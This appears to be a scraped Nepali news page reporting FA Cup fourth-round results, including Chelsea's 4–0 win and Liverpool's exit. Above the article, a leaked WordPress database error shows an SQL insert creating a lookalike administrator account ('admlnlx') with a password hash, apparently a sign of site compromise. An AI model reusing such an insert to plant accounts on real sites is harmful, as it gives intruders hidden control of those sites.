WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtzxyT91nzyI3KzO36BDpOojiapxUh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 03:52:50', '', 'admlnlx', 'admlnlx')
चितवन, माघ १६–
चेल्सी, म्यानचेष्टर सिटी, आर्सनल र टोटनह्याम हट्सपर इङलिश एफए कप फुटबलको पाँचौं चरणमा प्रवेश गरेका छन्।
लिग लिडर चेल्सीले ब्रेन्टफोर्डमाथि ४–० को फराकिलो जित निकाल्यो । चेल्सीको जितमा विलियन, पेड्रो रोड्रिग्वेज, ब्रानिस्लाभ इभानोभिच र मिचिले एक÷एक गोल गरेका थिए। त्यस्तै म्यानचेष्टर सिटीले क्रिष्टल प्यालेसलाई ३–० ले हराउँदै पाँचौ चरणमा प्रवेश गर्यो। म्यानचेष्टर सिटीलाई जिताउन रहिम स्टर्लिङ, लेरोए सान र याया टुरेले एक एक गोल गरेका थिए। त्यसैगरी थिओ वाल्कोटले ह्याट्रिकको मद्दतले आर्सनल प्रिमियर क्लव साउथह्याम्पटनमाथि ५–० को शानदार जित गराउन सफल भयो। आर्सनलमाथि फराकिलो जित दिलाउने क्रममा थिओ वाल्कोटले ह्याट्रिक गरे भने डयानी वेल्बेकले दुई गोल थपे। टोटनह्यामले वाइकम्बे वान्डरर्सलाई ४–३ ले, बर्नलेले ब्रिस्टोल सिटीलाई २–० ले, ब्ल्याकबर्न रोभर्सले ब्ल्याकपुललाई २–० ले, मिडिल्सब्रोले एक्रिंगटनलाई १–० ले तथा अक्सफोर्डले न्यूकासललाई ३–० ले हरायो ।
यसैबीच वुल्भरह्याम्पन वान्डरर्सले लिभरपुललाई २–१ ले हराएपछि लिभरपुल भने चौथो चरणबाटै बाहिरिएको छ।